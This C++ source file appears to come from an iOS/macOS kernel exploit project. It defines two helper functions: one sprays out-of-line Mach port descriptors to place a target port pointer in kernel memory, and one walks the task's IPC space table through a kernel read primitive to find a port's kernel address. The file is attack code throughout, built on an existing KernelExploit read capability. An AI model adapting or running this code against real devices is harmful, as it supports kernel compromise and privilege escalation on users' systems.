//
//  Utility.cpp
//
//  Created by Umang Raghuvanshi on 02/08/19.
//  Copyright © 2019 Umang Raghuvanshi. All rights reserved. Licensed under the
//  BSD 3-clause license.

// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
// 1. Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
// 2. Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
// 3. Neither the name of the copyright holder nor the names of its contributors
// may be used to endorse or promote products derived from this software without
// specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT
// HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
// INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
// INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
// OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
// LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
// NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
// EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

mach_port_t Utility::sprayPortPointer(mach_port_t targetPortName,
                                      unsigned int count, int disposition) {
  mach_port_t remotePort = MACH_PORT_NULL;
  if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
                         &remotePort) != KERN_SUCCESS)
    throw std::runtime_error("Failed to allocate a port");

  auto ports = std::vector<mach_port_t>(count, targetPortName);

  struct ool_msg msg = {0};
  msg.hdr.msgh_bits =
      MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
  msg.hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);
  msg.hdr.msgh_remote_port = remotePort;
  msg.hdr.msgh_local_port = MACH_PORT_NULL;
  msg.hdr.msgh_id = 0x41414141;

  msg.body.msgh_descriptor_count = 1;

  msg.ool_ports.address = ports.data();
  msg.ool_ports.count = count;
  msg.ool_ports.deallocate = 0;
  msg.ool_ports.disposition = disposition;
  msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
  msg.ool_ports.copy = MACH_MSG_PHYSICAL_COPY;

  if (mach_msg(&(msg.hdr), MACH_SEND_MSG | MACH_MSG_OPTION_NONE,
               msg.hdr.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE,
               MACH_PORT_NULL) != KERN_SUCCESS)
    throw std::runtime_error("Failed to spray target port's address");

  return remotePort;
}

uint64_t Utility::findPort(const mach_port_t targetPort,
                           const uint64_t currentTaskKaddr,
                           const Parameters &params,
                           KernelExploit &exploit) {
  const uint64_t itkSpace =
      exploit.read64(currentTaskKaddr + params.get(Task_ITKSpace));
  const uint64_t isTable =
      exploit.read64(itkSpace + params.get(IPCSpace_ISTable));
  const uint32_t idx = targetPort >> 8;
  const uint64_t portAddr =
      exploit.read64(isTable + (idx * params.get(IPCSpace_ISTableSize)));

  return portAddr;
}
